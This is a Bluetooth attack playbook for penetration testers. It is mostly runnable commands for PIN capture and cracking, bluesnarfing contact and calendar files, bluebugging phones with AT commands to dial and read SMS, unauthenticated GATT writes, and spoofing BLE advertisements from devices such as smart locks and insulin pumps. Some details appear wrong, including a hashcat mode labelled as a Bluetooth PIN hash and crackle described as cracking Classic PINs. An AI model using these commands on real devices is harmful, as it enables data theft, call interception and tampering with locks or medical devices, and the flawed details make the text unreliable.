Bluetooth Attacks
#Overview
Bluetooth is a short-range wireless protocol used by billions of devices for audio, data transfer, peripherals, and IoT connectivity. Bluetooth Classic (BR/EDR) and Bluetooth Low Energy (BLE) have distinct attack surfaces. Classic Bluetooth is vulnerable to pairing exploitation, eavesdropping, and device hijacking, while BLE is vulnerable to enumeration, GATT service exploitation, and advertising spoofing.
#Attack Decision Tree
Bluetooth Target Identified?
|
|-- Bluetooth Classic (BR/EDR)
| |-- Discoverable device --> [Enumeration](#discovery-and-enumeration)
| |-- Unknown device --> Brute-force inquiry
| |-- Pairing exploit --> [Classic Pairing Attacks](#classic-pairing-attacks)
| |-- Bluesnarfing / Bluebugging --> [Data Extraction](#bluesnarfing-and-bluebugging)
|
|-- Bluetooth Low Energy (BLE)
| |-- Advertising device --> BLE enumeration
| |-- GATT services --> [GATT Exploitation](#ble-gatt-exploitation)
| |-- Spoofing target --> [BLE Spoofing](#ble-advertising-spoofing)
|
|-- Ubertooth available?
|-- Full sniffing capability --> [Ubertooth Sniffing](#ubertooth-sniffing)
|-- No Ubertooth --> Limited to active scanning
TEXT
#Discovery and Enumeration
#Bluetooth Classic Discovery
# Basic device discovery
sudo hcitool scan
# Extended inquiry (includes device class, name, RSSI)
sudo hcitool inq
# Continuous scanning
sudo hcitool lescan
# Device information
sudo hcitool info <BD_ADDR>
# SDP (Service Discovery Protocol) enumeration
sdptool records <BD_ADDR>
# Browse SDP records
sdptool browse <BD_ADDR>
BASH
#BLE Discovery
# BLE device discovery
sudo hcitool lescan
# Detailed BLE scan with bettercap
sudo bettercap -iface hci0
> ble.recon on
> ble.show
# Connect to BLE device and enumerate services
gatttool -b <BD_ADDR> -I
> connect
> primary
> characteristics
> char-desc
> char-read-hdl 0x0001
BASH
#Automated Discovery Tools
# bluelog - Automated Bluetooth discovery
sudo bluelog -i hci0 -o bluetooth_devices.log
# btscanner - Interactive Bluetooth scanner
sudo btscanner -i hci0
# Bettercap - Comprehensive BLE scanner
sudo bettercap -iface hci0
> ble.recon on
> ble.show
BASH
#Classic Pairing Attacks
#Legacy Pairing (PIN/Passkey)
Legacy Bluetooth pairing uses a 4-8 digit PIN that's transmitted with minimal protection. The PIN can be cracked offline.
# Capture pairing exchange with Ubertooth
ubertooth-rx -f -c pairing_capture.pcap
# Crack the PIN from captured pairing data
crackle -i pairing_capture.pcap -o cracked_pin.txt
# Or use hashcat for PIN cracking
# Bluetooth PIN hash: mode 19500
BASH
#Secure Simple Pairing (SSP) - Just Works
The "Just Works" SSP association model provides no MITM protection and is vulnerable to passive eavesdropping if the pairing exchange is captured.
# Capture SSP pairing with Ubertooth
ubertooth-rx -f -c ssp_capture.pcap
# SSP "Just Works" can be brute-forced with the captured nonce
# The pairing verification value can be computed offline
BASH
#Bluetooth PIN Cracking
# Using crackle for legacy pairing
crackle -i paired.pcap
# Using BtCrack (GPU-accelerated)
# git clone https://github.com/omri-borovik/BtCrack.git
# Requires: captured pairing exchange
# Using hashcat for Bluetooth PIN
hashcat -m 19500 captured_hash.txt wordlist.txt
BASH
#Bluesnarfing and Bluebugging
#Bluesnarfing (Data Theft)
Bluesnarfing exploits the OBEX Push service to read files from a target device without authentication.
# Check for OBEX Push service
sdptool records <BD_ADDR> | grep -A5 "OBEX Object Push"
# Bluesnarfing tool
# Requires: obexftp, bluesnarf
obexftp -b <BD_ADDR> -c / -l
# Download specific files
obexftp -b <BD_ADDR> -c / -g telecom/cal.txt
obexftp -b <BD_ADDR> -c / -g telecom/pb.txt
# List directory contents
obexftp -b <BD_ADDR> -c / -l
BASH
#Bluebugging (Remote Control)
Bluebugging exploits the RFCOMM serial port to send AT commands, enabling call interception and device control.
# Connect to RFCOMM serial port
rfcomm connect hci0 <BD_ADDR> 1
# Or use bluebugger
bluebugger -a <BD_ADDR> -c hci0 info
# AT commands for call control:
# ATD<number>; - Dial a number
# AT+CLCC - List current calls
# ATH - Hang up
# AT+CPBR=1,100 - Read phone book entries
# AT+CMGR=1 - Read SMS message #1
BASH
#BLE GATT Exploitation
#GATT Service Enumeration
# Connect and enumerate all GATT services and characteristics
gatttool -b <BD_ADDR> -I
> connect
> primary
> characteristics
> char-desc
# Read all readable characteristics
gatttool -b <BD_ADDR> --char-read -a 0x0001
# Write to a writable characteristic (test for unauthorized writes)
gatttool -b <BD_ADDR> --char-write-req -a 0x0025 -n 0100
# Read characteristic value
gatttool -b <BD_ADDR> --char-read -a 0x0025
BASH
#Common GATT Vulnerabilities
| Vulnerability | Description | Impact |
|---|---|---|
| Unauthenticated reads | Characteristics readable without bonding | Data leakage |
| Unauthenticated writes | Characteristics writable without bonding | Device control |
| Sensitive data in cleartext | No encryption on GATT operations | Eavesdropping |
| Hardcoded credentials | Default PINs or tokens in characteristics | Authentication bypass |
| Insecure firmware updates | OTA updates without signature verification | Firmware modification |
| Missing rate limiting | No limit on characteristic write frequency | DoS |
#BLE Exploitation with Bettercap
# Start bettercap BLE scanning
sudo bettercap -iface hci0
# Discover BLE devices
> ble.recon on
> ble.show
# Enumerate a specific device
> ble.enum <BD_ADDR>
# Read a characteristic
> ble.read <BD_ADDR> <UUID>
# Write to a characteristic
> ble.write <BD_ADDR> <UUID> <HEX_DATA>
BASH
#BLE Advertising Spoofing
BLE advertising packets are broadcast unencrypted, allowing an attacker to spoof device advertisements.
# BLE advertising spoofing with Bettercap
sudo bettercap -iface hci0
# Spoof a BLE device advertisement
> ble.spoof on
> set ble.spoof.address <SPOOFED_MAC>
> set ble.spoof.advertising_data <HEX_DATA>
> ble.spoof on
# Common spoofing targets:
# - Fitness trackers (Fitbit, Garmin)
# - Smart locks (August, Kwikset)
# - Beacons (iBeacon, Eddystone)
# - Medical devices (insulin pumps, heart monitors)
BASH
#Ubertooth Sniffing
Ubertooth One is a dedicated Bluetooth sniffing tool that can capture Bluetooth traffic in promiscuous mode, including traffic between other devices.
# Install Ubertooth tools
apt install ubertooth
# Basic sniffing
ubertooth-rx -f
# Capture to pcap for Wireshark analysis
ubertooth-rx -f -c capture.pcap
# Follow a specific connection
ubertooth-follow -a <BD_ADDR>
# Capture pairing exchange
ubertooth-rx -f -c pairing.pcap
# Analyze captured data with Wireshark
wireshark capture.pcap
# Filter: btbll, btatt, btsmp, btl2cap
BASH
#Wireshark Bluetooth Filters
| Filter | Purpose |
|---|---|
btbll | Bluetooth Link Layer |
btatt | Bluetooth ATT (GATT) |
btsmp | Bluetooth Security Manager Protocol |
btl2cap | Bluetooth L2CAP |
rfcomm | RFCOMM (serial port) |
obex | OBEX (file transfer) |
hci_cmd | HCI commands |
hci_evt | HCI events |
#Practical: Bluetooth Assessment Methodology
- Discovery: Use
hcitool scan,hcitool lescan, and bettercap to enumerate all Bluetooth devices - Service enumeration: Use
sdptool recordsandgatttoolto enumerate all services and characteristics - Authentication testing: Test each service for authentication requirements
- Data extraction: Attempt to read all readable characteristics without authentication
- Write testing: Attempt to write to all writable characteristics without authentication
- Pairing testing: Attempt pairing with default PINs (0000, 1234, 1111)
- Eavesdropping: Use Ubertooth to capture and analyze Bluetooth traffic
- Report findings: Document all vulnerabilities with screenshots and packet captures
#Common Pitfalls
- Bluetooth adapter limitations: Internal laptop Bluetooth adapters often don't support promiscuous mode or BLE sniffing. Use a dedicated adapter (CSR8510, Ubertooth).
- Range limitations: BT Classic range is ~10m (Class 2) or ~100m (Class 1). BLE range is ~50-100m.
- Pairing history: Previously paired devices may auto-reconnect. Clear pairing history before testing.
- BLE version differences: BLE 4.0, 4.1, 4.2, 5.0 have different security features. Test the specific version.
- Device responsiveness: Some devices enter low-power mode and stop advertising. Use active scanning to wake them.
#OPSEC Considerations
- Bluetooth scanning is detectable by devices in discoverable mode
- Active pairing attempts are logged by some devices
- Ubertooth transmissions are visible to other Bluetooth sniffers
- Bluesnarfing and bluebugging are illegal without authorization
- Medical device testing (insulin pumps, pacemakers) carries extreme risk
#Cross-References
- Zigbee/Z-Wave Attacks — Other short-range wireless protocols
- SDR Wireless Attacks — Sub-GHz frequency analysis
- 01 - Pre-Foothold — Wireless assessment methodology
#Tool References
| Tool | Purpose | Link |
|---|---|---|
| hcitool | Bluetooth Classic discovery | BlueZ (Linux standard) |
| gatttool | BLE GATT enumeration | BlueZ |
| bettercap | BLE scanning and exploitation | https://www.bettercap.org/ |
| Ubertooth | Bluetooth sniffing | https://github.com/greatscottgadgets/ubertooth |
| crackle | Bluetooth PIN cracking | https://github.com/mikeryan/crackle |
| bluelog | Automated BT discovery | https://github.com/jacopovalk/bluelog |
| btscanner | Interactive BT scanner | Kali Linux |
| spooftooph | Bluetooth spoofing | Kali Linux |